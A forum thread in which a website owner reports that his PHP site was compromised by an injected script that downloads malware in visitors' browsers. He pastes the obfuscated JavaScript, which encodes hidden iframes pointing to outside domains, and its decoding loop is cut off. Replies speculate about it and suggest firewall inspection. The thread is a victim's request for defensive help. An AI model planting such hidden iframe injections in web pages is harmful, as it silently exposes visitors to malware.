Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

• Congratulations SkipVought on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

site hacked by innjecting script

Status
Not open for further replies.

blueguitar

Technical User
Jul 4, 2008
My site indiantaxsolutions.com has been hacked recently by injecting the following script . This script starts downloading malware,badware as soon as the page is resolved in the browser . Hosting guys say they cannt do any thing about it and requested upgrade script .
site was built using PHP 4 . Google has block the site following this attack . I have removed script all those files and uploaded the clean ones but site is still vulnerable to such .

Some body may please let me know the solutions.

<script>var source ="=jgsbnf!tsd>#iuuq;00tfpusbgg/jogp0dpvoufs0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?=jgsbnf!tsd>#iuuq;00pqfsbujwf/dd0hpphmf0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i </script>

Poor guy posted this to three forums and never received an actual response.. looks encrypted (makes no sense) or like rubbish to me.. Unless the actual script places this on the pages as an (I was here) type of thing.. or to make the real script less noticeable..

Anyone?

B Haines
CCNA R&S, ETA FOI

If you have ASA with 7.2 or above code you can do a deep http inspection with custom signatures using regular expressions for the specific script and drop that traffic.

Status
Not open for further replies.

Part and Inventory Search

Sponsor

Back